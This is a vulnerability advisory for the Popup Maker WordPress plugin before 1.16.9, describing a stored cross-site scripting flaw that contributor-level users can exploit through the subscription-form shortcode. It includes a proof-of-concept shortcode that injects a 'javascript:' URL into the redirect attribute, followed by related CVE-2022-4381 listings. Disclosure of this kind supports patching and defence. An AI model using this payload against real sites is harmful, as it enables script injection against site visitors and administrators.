Lucene search
An DoanWPEX-ID:8BF8EBE8-1063-492D-A0F9-2F824408D0DFHistorySep 23, 2022 - 12:00 a.m.
Popup Maker < 1.16.9 - Contributor+ Stored XSS via Subscription Form
2022-09-2300:00:00
An Doan
125
0.001 Low
EPSS
Percentile
23.5%
The plugin does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks
As a contributor, put the following shortcode in a post/page
[pum_sub_form name_field_type="fullname" label_name="Name" label_email="Email" label_submit="Subscribe" placeholder_name="Name" placeholder_email="Email" form_layout="block" form_alignment="center" form_style="default" privacy_consent_enabled="yes" privacy_consent_label="Notify me about related content and special offers." privacy_consent_type="radio" privacy_consent_radio_layout="inline" privacy_consent_yes_label="Yes" privacy_consent_no_label="No" privacy_usage_text="If you opt in above we use this information send related content, discounts and other special offers." redirect_enabled redirect="javascript:alert(/XSS/)"]
The XSS will be triggered when previewing/viewing the post/page and submitting the formRelated
cve
cve
CVE-2022-4381
2023-01-02 22:15:18
osv
osv
CVE-2022-4381
2023-01-02 22:15:18
cvelist
cvelist
wpvulndb
wpvulndb
Popup Maker < 1.16.9 - Contributor+ Stored XSS via Subscription Form
2022-09-23 00:00:00
nvd
nvd
CVE-2022-4381
2023-01-02 22:15:18
prion
prion
Cross site scripting
2023-01-02 22:15:00
openvas
openvas
WordPress Popup Maker Plugin < 1.16.9 Multiple XSS Vulnerabilities
2023-02-23 00:00:00